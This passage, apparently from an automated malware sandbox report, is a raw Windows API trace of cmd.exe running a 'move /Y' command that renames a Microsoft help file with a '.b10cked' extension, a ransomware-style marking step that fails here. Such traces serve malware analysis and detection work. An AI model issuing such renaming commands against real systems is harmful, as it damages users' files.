CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.241] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0204.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.241] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0204.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.241] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.241] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.241] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.242] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.242] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.242] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.242] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0204.242] GetEnvironmentStringsW () returned 0x320178* [0204.242] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0204.243] GetEnvironmentStringsW () returned 0x320178* [0204.243] FreeEnvironmentStringsW (penv=0x320178) returned 1 [0204.243] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb1c | out: phkResult=0x12eb1c*=0x40) returned 0x0 [0204.246] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0xa0, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x0, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegCloseKey (hKey=0x40) returned 0x0 [0204.250] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eb1c | out: phkResult=0x12eb1c*=0x40) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x40, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x1, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x0, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x9, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x4, lpData=0x12eb28*=0x9, lpcbData=0x12eb20*=0x4) returned 0x0 [0204.250] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eb24, lpData=0x12eb28, lpcbData=0x12eb20*=0x1000 | out: lpType=0x12eb24*=0x0, lpData=0x12eb28*=0x9, lpcbData=0x12eb20*=0x1000) returned 0x2 [0204.251] RegCloseKey (hKey=0x40) returned 0x0 [0204.251] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a6 [0204.251] srand (_Seed=0x5b8863a6) [0204.251] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"" [0204.251] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked\"" [0204.251] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.251] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218d8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0204.252] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0204.252] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0204.252] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.252] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0204.252] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0204.252] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0204.252] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0204.252] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0204.252] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0204.252] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0204.252] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0204.252] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0204.252] GetEnvironmentStringsW () returned 0x3222c8* [0204.261] FreeEnvironmentStringsW (penv=0x3222c8) returned 1 [0204.261] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.261] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0204.261] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0204.261] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0204.261] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0204.261] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0204.261] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0204.261] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0204.261] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0204.261] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0204.261] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f8e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.261] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f8e8, lpFilePart=0x12f8e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f8e4*="Desktop") returned 0x18 [0204.261] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.261] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f664 | out: lpFindFileData=0x12f664) returned 0x320008 [0204.262] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0204.262] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f664 | out: lpFindFileData=0x12f664) returned 0x320008 [0204.262] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0204.262] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f664 | out: lpFindFileData=0x12f664) returned 0x320008 [0204.262] FindClose (in: hFindFile=0x320008 | out: hFindFile=0x320008) returned 1 [0204.262] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0204.262] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0204.262] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0204.263] GetEnvironmentStringsW () returned 0x322ae8* [0204.263] FreeEnvironmentStringsW (penv=0x322ae8) returned 1 [0204.263] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.263] GetConsoleOutputCP () returned 0x1b5 [0204.263] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.263] GetUserDefaultLCID () returned 0x409 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fa28, cchData=128 | out: lpLCData="0") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fa28, cchData=128 | out: lpLCData="0") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fa28, cchData=128 | out: lpLCData="1") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.264] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.265] GetConsoleTitleW (in: lpConsoleTitle=0x3108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.265] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.265] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.265] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.265] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.266] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.266] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.266] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.266] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.266] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0204.266] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.266] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.269] GetConsoleTitleW (in: lpConsoleTitle=0x12f720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.649] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.650] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.650] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.650] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.650] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.650] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.650] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.650] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.650] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.650] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.650] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.650] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.650] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.650] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.650] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.650] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.650] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.651] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.651] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.651] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.651] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.651] _wcsicmp (_String1="move", _String2="VER") returned -9 [0204.651] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.651] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.651] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.651] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.651] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.651] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.651] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.651] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.651] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.654] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f4dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f4d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f4d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0204.656] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.656] _wcsicmp (_String1="MSOIS1~1.HXN", _String2=".") returned 63 [0204.656] _wcsicmp (_String1="MSOIS1~1.HXN", _String2="..") returned 63 [0204.656] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msois1~1.hxn")) returned 0x2022 [0204.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.657] SetErrorMode (uMode=0x0) returned 0x0 [0204.657] SetErrorMode (uMode=0x1) returned 0x0 [0204.657] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", nBufferLength=0x104, lpBuffer=0x12ee64, lpFilePart=0x12ee4c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", lpFilePart=0x12ee4c*="MSOIS1~1.HXN") returned 0x27 [0204.657] SetErrorMode (uMode=0x0) returned 0x1 [0204.657] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.657] _wcsicmp (_String1="MSOIS1~1.HXN", _String2=".") returned 63 [0204.657] _wcsicmp (_String1="MSOIS1~1.HXN", _String2="..") returned 63 [0204.658] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msois1~1.hxn")) returned 0x2022 [0204.658] SetErrorMode (uMode=0x0) returned 0x0 [0204.658] SetErrorMode (uMode=0x1) returned 0x0 [0204.658] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", nBufferLength=0x104, lpBuffer=0x12f2e0, lpFilePart=0x12f078 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", lpFilePart=0x12f078*="MSOIS1~1.HXN") returned 0x27 [0204.658] SetErrorMode (uMode=0x0) returned 0x1 [0204.658] SetErrorMode (uMode=0x0) returned 0x0 [0204.658] SetErrorMode (uMode=0x1) returned 0x0 [0204.658] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f4e8, lpFilePart=0x12f078 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked", lpFilePart=0x12f078*="MS.OIS.14.1033.hxn.b10cked") returned 0x35 [0204.658] SetErrorMode (uMode=0x0) returned 0x1 [0204.658] SetLastError (dwErrCode=0x0) [0204.659] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.ois.14.1033.hxn.b10cked")) returned 0xffffffff [0204.659] GetLastError () returned 0x2 [0204.659] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9f4) returned 0x310e50 [0204.659] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x12e9f4 | out: lpFindFileData=0x12e9f4) returned 0 [0204.660] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.660] GetLastError () returned 0x12 [0204.660] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9f4) returned 0x310e50 [0204.660] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x12e9f4 | out: lpFindFileData=0x12e9f4) returned 0 [0204.660] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.661] GetLastError () returned 0x12 [0204.662] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bd0) returned 0x310e50 [0204.662] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x321bd0 | out: lpFindFileData=0x321bd0) returned 0 [0204.662] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.662] GetLastError () returned 0x12 [0204.662] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bd0) returned 0x310e50 [0204.662] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x321bd0 | out: lpFindFileData=0x321bd0) returned 0 [0204.662] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.663] GetLastError () returned 0x12 [0204.663] _get_osfhandle (_FileHandle=2) returned 0xb [0204.663] GetFileType (hFile=0xb) returned 0x2 [0204.663] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.663] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12ebc4 | out: lpMode=0x12ebc4) returned 1 [0204.663] _get_osfhandle (_FileHandle=2) returned 0xb [0204.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ebf8 | out: lpConsoleScreenBufferInfo=0x12ebf8) returned 1 [0204.664] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.665] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ec38 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.665] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12ec1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ec1c*=0x2c) returned 1 [0204.666] longjmp () [0204.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.666] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0204.667] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.667] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.667] SetConsoleInputExeNameW () returned 0x1 [0204.667] GetConsoleOutputCP () returned 0x1b5 [0204.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.667] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.668] exit (_Code=1) Process: id = "471" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" 